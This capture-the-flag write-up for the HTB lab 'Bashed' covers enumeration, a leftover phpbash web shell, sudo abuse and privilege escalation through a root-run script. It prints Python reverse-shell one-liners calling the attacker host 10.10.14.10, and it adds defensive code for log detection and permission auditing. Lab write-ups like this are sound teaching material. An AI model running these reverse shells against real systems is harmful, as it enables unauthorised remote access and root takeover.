[HTB] Bashed

Today we are going to hack the HTB machine called Bashed.
  • Enumeration
  • To start, we run nmap to see which ports are open.
    sml@Cassandra:~$ nmap -A -p- 10.10.10.68
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-01 11:32 CEST
    Nmap scan report for 10.10.10.68
    Host is up (0.032s latency).
    Not shown: 65534 closed ports
    PORT   STATE SERVICE VERSION
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Arrexel's Development Site

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 28.54 seconds
    We see that only port 80 is open. Let's look into it a bit more.
    sml@Cassandra:~$ gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirb/common.txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://10.10.10.68
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirb/common.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Timeout:        10s
    ===============================================================
    2020/06/01 11:33:33 Starting gobuster
    ===============================================================
    /.hta (Status: 403)
    /.htpasswd (Status: 403)
    /.htaccess (Status: 403)
    /css (Status: 301)
    /dev (Status: 301)
    /fonts (Status: 301)
    /images (Status: 301)
    /index.html (Status: 200)
    /js (Status: 301)
    /php (Status: 301)
    /server-status (Status: 403)
    /uploads (Status: 301)
    ===============================================================
    2020/06/01 11:33:50 Finished
    ===============================================================
  • Low Shell
  • We find the /dev directory. If we visit http://10.10.10.68/dev/phpbash.php we can see that a "console" is being run through the web. We set nc listening.
    sml@Cassandra:~$ nc -nlvp 5555
    listening on [any] 5555 ...
    And in the web "console" we enter the following line to get a shell.
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    We have it...
    sml@Cassandra:~$ nc -nlvp 5555
    listening on [any] 5555 ...
    connect to [10.10.14.10] from (UNKNOWN) [10.10.10.68] 4
    /bin/sh: 0: can't access tty; job control turned off
    $ python -c 'import pty; pty.spawn("/bin/sh")'
    $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
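    The foothold here is a web shell (phpbash.php) left in a directory found by brute-forcing paths. From the defender's side the same activity is visible in the Apache access log: a scanner user agent walking the tree, then a PHP file under /dev/ answering 200 to GET and POST. The following Python is an added example, not code from the original write-up; the log lines are constructed for it (the path /dev/phpbash.php, the hosts and the gobuster version are taken from the write-up), and the directory list and user-agent markers are assumptions you would tune per site.

```python
import re
from collections import Counter

# Constructed Apache "combined" log lines for this example (not real captured traffic).
SAMPLE_ACCESS_LOG = """\
10.10.14.10 - - [01/Jun/2020:11:33:33 +0200] "GET /index.html HTTP/1.1" 200 7743 "-" "gobuster/3.0.1"
10.10.14.10 - - [01/Jun/2020:11:33:34 +0200] "GET /dev HTTP/1.1" 301 309 "-" "gobuster/3.0.1"
10.10.14.10 - - [01/Jun/2020:11:33:35 +0200] "GET /uploads HTTP/1.1" 301 313 "-" "gobuster/3.0.1"
10.10.14.10 - - [01/Jun/2020:11:35:02 +0200] "GET /dev/phpbash.php HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
10.10.14.10 - - [01/Jun/2020:11:35:40 +0200] "POST /dev/phpbash.php HTTP/1.1" 200 318 "http://10.10.10.68/dev/phpbash.php" "Mozilla/5.0"
192.168.1.20 - - [01/Jun/2020:11:36:00 +0200] "GET /css/style.css HTTP/1.1" 200 1422 "http://10.10.10.68/index.html" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumed policy for this site: PHP should never execute from /dev/ or /uploads/.
SUSPICIOUS_PHP_DIRS = ("/dev/", "/uploads/")
# Filenames of web shells seen before (phpbash.php is the one from this box).
KNOWN_SHELL_NAMES = {"phpbash.php"}
# Substrings that identify common enumeration tools in the User-Agent header.
SCANNER_UA_MARKERS = ("gobuster", "dirb", "nikto", "sqlmap")


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def analyse_access_log(text):
    """Scan log text; return (findings, scanner_hits).

    findings:     list of (client_ip, reason, path, method) tuples
    scanner_hits: Counter of requests per client whose UA looks like a scanner
    """
    findings = []
    scanner_hits = Counter()
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]      # drop the query string
        name = path.rsplit("/", 1)[-1]
        if name in KNOWN_SHELL_NAMES:
            findings.append((rec["ip"], "known-webshell", path, rec["method"]))
        elif path.endswith(".php") and path.startswith(SUSPICIOUS_PHP_DIRS) and rec["status"] == "200":
            findings.append((rec["ip"], "php-in-untrusted-dir", path, rec["method"]))
        if any(mark in rec["ua"].lower() for mark in SCANNER_UA_MARKERS):
            scanner_hits[rec["ip"]] += 1
    return findings, scanner_hits


if __name__ == "__main__":
    hits, scanners = analyse_access_log(SAMPLE_ACCESS_LOG)
    for ip, reason, path, method in hits:
        print(f"{ip} {reason} {method} {path}")
    for ip, n in scanners.items():
        print(f"{ip} scanner-like requests: {n}")
```

Run against the constructed lines this reports two hits from 10.10.14.10 on /dev/phpbash.php (the GET that loads the shell and the POST that runs a command) and three scanner-tagged requests from the same client; on a real host the POST to a PHP file nobody deployed is the line worth alerting on, and the fix is to remove the file and stop PHP execution in directories that only hold static or uploaded content.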
  • user.txt
  • $ cd /home
    $ ls
    arrexel  scriptmanager
    $ cd arrexel
    $ ls
    user.txt
    $ cat user.txt
    2c281f318555dbc1b856957c7147bfc1
    We take a look to see what we can do.
    $ sudo -l
    Matching Defaults entries for www-data on bashed:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User www-data may run the following commands on bashed:
        (scriptmanager : scriptmanager) NOPASSWD: ALL
    We use sudo to get the privileges of the scriptmanager user.
    $ sudo -u scriptmanager /bin/bash
    scriptmanager@bashed:/var/www/html/dev$ id
    uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
  • Privilege Escalation
  • We see there is a folder called /scripts, and that a script in it (test.py) is executed with root privileges. We are going to modify it to get another reverse shell, this time with root privileges. We set nc listening...
    sml@Cassandra:~$ nc -nlvp 8888
    listening on [any] 8888 ...
    And here we go :)
    scriptmanager@bashed:/$ cd /scripts
    scriptmanager@bashed:/scripts$ ls
    test.py  test.txt
    scriptmanager@bashed:/scripts$ cat test.py
    f = open("test.txt", "w")
    f.write("testing 123!")
    f.close
    scriptmanager@bashed:/scripts$ cat test.txt
    testing 123!
    scriptmanager@bashed:/scripts$ ls -l
    ls -l
    total 8
    -rw-r--r-- 1 scriptmanager scriptmanager 58 Dec  4  2017 test.py
    -rw-r--r-- 1 root          root          12 May  9 15:06 test.txt
    echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > test.py
    After waiting, we have it!
    sml@Cassandra:~$ nc -nlvp 8888
    listening on [any] 8888 ...
    connect to [10.10.14.10] from (UNKNOWN) [10.10.10.68] 55334
    /bin/sh: 0: can't access tty; job control turned off
    # id
    uid=0(root) gid=0(root) groups=0(root)
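    The root path here is a file-ownership bug, not a code bug: test.py is owned by scriptmanager (the `ls -l` above shows it, and test.txt owned by root shows who actually runs it), so whoever holds that account controls what root executes. The check below is an added example, not code from the original write-up: it walks a directory of scripts that a root job is expected to run and reports any file (or the directory itself) that is owned by someone other than the trusted uid or is writable by group or world. The `trusted_uid` parameter and the demo directory are assumptions made so the check can be exercised without root; on a real host you would point it at /scripts and leave `trusted_uid` at 0.

```python
import os
import stat
import tempfile


def audit_root_scripts(directory, trusted_uid=0):
    """Return {path: [issues]} for a directory whose scripts are run by root.

    Issues reported:
      - owned by a uid other than trusted_uid (that uid can rewrite the script)
      - group-writable or world-writable (anyone in that set can rewrite it)
      - symlink (the target can be swapped without touching the directory)
    The directory itself is checked with the same rules, because a writable
    directory lets a non-owner replace the file even if the file is tight.
    """
    issues = {}

    def check(path, st):
        found = []
        mode = stat.S_IMODE(st.st_mode)
        if st.st_uid != trusted_uid:
            found.append(f"owned by uid {st.st_uid}, not {trusted_uid}")
        if mode & stat.S_IWGRP:
            found.append("group-writable")
        if mode & stat.S_IWOTH:
            found.append("world-writable")
        if found:
            issues[path] = found

    check(directory, os.stat(directory))
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        st = os.lstat(path)
        if stat.S_ISLNK(st.st_mode):
            issues[path] = ["symlink: target could be swapped"]
        elif stat.S_ISREG(st.st_mode):
            check(path, st)
    return issues


def build_demo_dir():
    """Construct a temporary look-alike of /scripts (demo data, not the real box).

    backup.py is kept tight (0644); test.py is left world-writable (0666), which is
    the kind of mistake that made the box's test.py rewritable.
    """
    d = tempfile.mkdtemp(prefix="scripts-demo-")
    os.chmod(d, 0o755)
    tight = os.path.join(d, "backup.py")
    with open(tight, "w") as f:
        f.write("print('ok')\n")
    os.chmod(tight, 0o644)
    loose = os.path.join(d, "test.py")
    with open(loose, "w") as f:
        f.write('f = open("test.txt", "w")\nf.write("testing 123!")\nf.close()\n')
    os.chmod(loose, 0o666)
    return d


def run_demo():
    """Audit the demo directory twice: trusting the current user, then a foreign uid."""
    d = build_demo_dir()
    me = os.getuid()
    as_owner = audit_root_scripts(d, trusted_uid=me)
    as_other = audit_root_scripts(d, trusted_uid=me + 1)
    return {
        "dir": as_owner.get(d, []),
        "loose": as_owner.get(os.path.join(d, "test.py"), []),
        "tight": as_owner.get(os.path.join(d, "backup.py"), []),
        "tight_foreign_owner": as_other.get(os.path.join(d, "backup.py"), []),
    }


if __name__ == "__main__":
    for key, found in run_demo().items():
        print(f"{key}: {found or 'clean'}")
```

The second run, with a uid that does not own the files, is what the real /scripts directory looks like to root: every script owned by scriptmanager is reported even though its mode bits are fine. The remediation is the same either way: scripts run from a root cron job should be owned by root, mode 0755 or tighter, in a directory that only root can write to.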
  • root.txt
  • # cd /root
    # ls
    root.txt
    # cat root.txt
    cc4f0afe3a1026d402ba10329674a8e2
  • End
  • And with this we have both the "user" flag and the "root" flag.